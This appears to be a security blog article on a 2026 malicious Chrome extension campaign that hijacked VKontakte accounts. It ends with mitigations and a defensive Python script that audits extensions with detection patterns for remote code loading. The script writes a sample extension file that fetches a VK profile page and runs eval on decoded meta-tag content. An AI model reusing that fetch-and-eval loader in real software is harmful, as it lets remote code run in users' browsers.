Chrome Extension Posing as “VK Styles” Infects 500,000 Users, Hijacks VKontakte Accounts in Widespread Malware Campaign

In early February 2026, cybersecurity researchers uncovered a sophisticated malware campaign that quietly hijacked over 500,000 accounts on VKontakte (VK) — one of the largest social networks in Russia and surrounding regions. The culprit? A set of malicious Google Chrome extensions masquerading as harmless theme-and-style tools designed to enhance the VK user experience.

But beneath friendly names and thousands of installs lay a malicious operation capable of persistent account manipulation, covert data operations, and self-propagation. This isn’t your average ad injector — it’s a software supply chain attack embedded in browser extensions.


What Lay Behind the Illusion

At first glance, extensions like “VK Styles – Themes for vk.com” looked innocuous and helpful. They offered UI customizations, promised better visuals, and had positive reviews — all traits that helped them remain under the radar of casual users and automated scanners.

But a deeper analysis revealed multi-stage malicious behavior:

  • Dynamic payload loading through legitimate infrastructure (VK profiles and GitHub).
  • CSRF token manipulation to bypass VK’s protections.
  • Automated forced actions, such as subscribing users to attacker-controlled VK groups.
  • Periodic resetting of user settings to maintain control.
  • Monetization hooks leveraging VK’s own APIs.

What made this campaign especially clever was how the malware was delivered and updated: instead of hardcoding malicious payloads directly in the extension code, the extension fetched and used dynamic URLs hidden in the metadata of a VK profile. That profile effectively became the command and control (C2) infrastructure — hosted on VK itself.


A Technical Breakdown

Here’s how the malicious operation worked from a technical perspective:

Stage 1: Obfuscated Code and Dynamic Payloads

A routine scan flagged a Chrome extension injecting Yandex advertising code into all webpages. This unusual artifact triggered deeper inspection. What the researchers found was an innocuous-looking extension that, once installed, pulled executable code from a hidden location in a VK profile’s HTML metadata.

Instead of embedding payload URLs in the extension source, the extension read encrypted directives from the profile’s metadata tags, which pointed to:

  • a GitHub repository
  • a Yandex metrics / analytics URL
  • a third URL providing bundled scripts

This mechanism made static detection far less effective: with no hardcoded indicators in the extension package, static scanners had little to match on, which is exactly the evasion the design was built for.


Stage 2: Malicious Behavior After Activation

Once activated and running, the malware carried out several persistent actions:

Automatic Group Subscription

Every time the infected user visited VK, the extension had a 75% chance of forcing the victim’s account to auto-subscribe to an attacker-controlled group.

This built a self-propagating infection vector: more subscriptions lead to higher visibility and social proof, further attracting new victims.


Settings Reset

The malware reset core VK settings every 30 days, overriding personal preferences and preventing users from escaping its effects without removing the extension entirely.


CSRF Token Manipulation

By tampering with VK’s Cross-Site Request Forgery (CSRF) protection cookies, the malware could perform unauthorized actions on behalf of the user — such as manipulating subscriptions or modifying settings — without triggering security protections normally enforced by the platform.


Monetization & Feature Gating

The attacker also tracked payment statuses via VK’s “Donut” API — a feature normally used for creator-support contributions — allowing the malware to gate features and potentially extract monetization.


Scope & Campaign Structure

Analysis by Koi Security found five distinct Chrome extensions linked to the same actor and infrastructure, totaling over 502,000 confirmed installations before Google removed the most popular one from the Chrome Web Store.

The affected regions were primarily Russian-speaking communities, Eastern Europe, Central Asia, and broader diaspora networks — the campaign effectively leveraged VK’s popularity to spread the malware.


What This Means for Browser Security

This campaign illustrates major trends in modern malware distribution:

Extensions as an Attack Vector

Browser extensions run with high privilege and update automatically — making them prime targets for attackers. Prior research shows malicious extensions have been used for data exfiltration, click fraud, and account hijacking in many contexts.

Dynamic & Decentralized C2 Infrastructure

Using legitimate services like VK profiles and GitHub to host payload definitions and control endpoints makes detection much harder. Static scanning can no longer be the only defense.

Social Platforms as Malware Infrastructure

Embedding C2 in a social network profile isn’t just clever — it also circumvents typical domain-based blocking and reputation checks.


Mitigations & Best Practices

To defend against similar threats:

  • Limit extension privileges and audit them regularly.
  • Use enterprise extension whitelisting and behavioral monitoring.
  • Employ sandboxing and network analysis for client tools.
  • Educate users about risks of third-party extensions, even if they appear legitimate.
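As an added defensive example (not code from the article or from Koi Security), the following Python script audits an unpacked extension directory for the two warning signs described above: broad permissions, and the fetch-then-execute pattern in which code is pulled from a legitimate host such as a VK profile or GitHub and parsed out of page metadata. The sample extension it writes is constructed for the demonstration; the hostnames, permission lists and profile URL are assumptions, not indicators from the campaign.

```python
import json
import re
import tempfile
from pathlib import Path
# Permissions that let an extension read session cookies, rewrite traffic or run code on pages.
RISKY_PERMISSIONS = {"cookies", "scripting", "webRequest", "webRequestBlocking", "tabs"}
# The delivery pattern described above: fetch from a legitimate host, then execute the result.
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest)\b.{0,300}?(vk\.com|github\.com|githubusercontent\.com)", re.S)
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.src\s*=\s*[^;]*https?://|chrome\.scripting\.executeScript")
META_SCRAPE = re.compile(r"querySelector(All)?\s*\(\s*['\"]meta\[")

def audit_extension(root):
    """Return (category, file, detail) findings for an unpacked extension directory."""
    root = Path(root)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    findings = []
    for entry in list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", [])):
        if entry in RISKY_PERMISSIONS:
            findings.append(("risky_permission", "manifest.json", entry))
        elif entry in {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}:
            findings.append(("broad_host_permission", "manifest.json", entry))
    for js in sorted(root.rglob("*.js")):
        src = js.read_text(encoding="utf-8", errors="replace")
        rel = js.relative_to(root).as_posix()
        fetch_hit = REMOTE_FETCH.search(src)
        if fetch_hit and DYNAMIC_EXEC.search(src):
            findings.append(("remote_code_loading", rel, fetch_hit.group(2)))
        if fetch_hit and META_SCRAPE.search(src):
            findings.append(("metadata_lookup", rel, "parses <meta> tags of a fetched page"))
    return findings

def verdict(findings):
    """'block' when code is loaded from a remote page, 'review' on risky permissions alone."""
    kinds = {f[0] for f in findings}
    if kinds & {"remote_code_loading", "metadata_lookup"}:
        return "block"
    return "review" if kinds else "allow"

def write_sample_extension(dest=None):
    """Write a constructed sample (not the real extension) that shows the fetch-then-eval pattern."""
    dest = Path(dest) if dest else Path(tempfile.mkdtemp()) / "sample_ext"
    dest.mkdir(parents=True, exist_ok=True)
    (dest / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Sample Styles (constructed)", "version": "1.0",
        "permissions": ["cookies", "storage"], "host_permissions": ["<all_urls>"]}))
    (dest / "content.js").write_text(  # hypothetical profile URL; the meta tag is assumed to hold base64 code
        'fetch("https://vk.com/id0").then(r => r.text()).then(html => {\n  const tag = new DOMParser()'
        '.parseFromString(html, "text/html").querySelector(\'meta[name="description"]\');\n  eval(atob(tag.content)); });\n')
    return dest
```

Run it against every unpacked extension in a managed profile and feed the verdicts into the allowlist: anything that scores "block" should never reach the enterprise policy, and "review" items deserve a human look at why they need those permissions.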

Always assume browser extensions are powerful — and in the wrong hands, dangerous.


Final Takeaway

The VK Styles malware campaign represents a new level of malicious browser extension exploitation — blending dynamic delivery, social infrastructure abuse, and persistent account manipulation. As the browser ecosystem continues to expand, so too will the sophistication of attacks. Security teams and users must stay vigilant.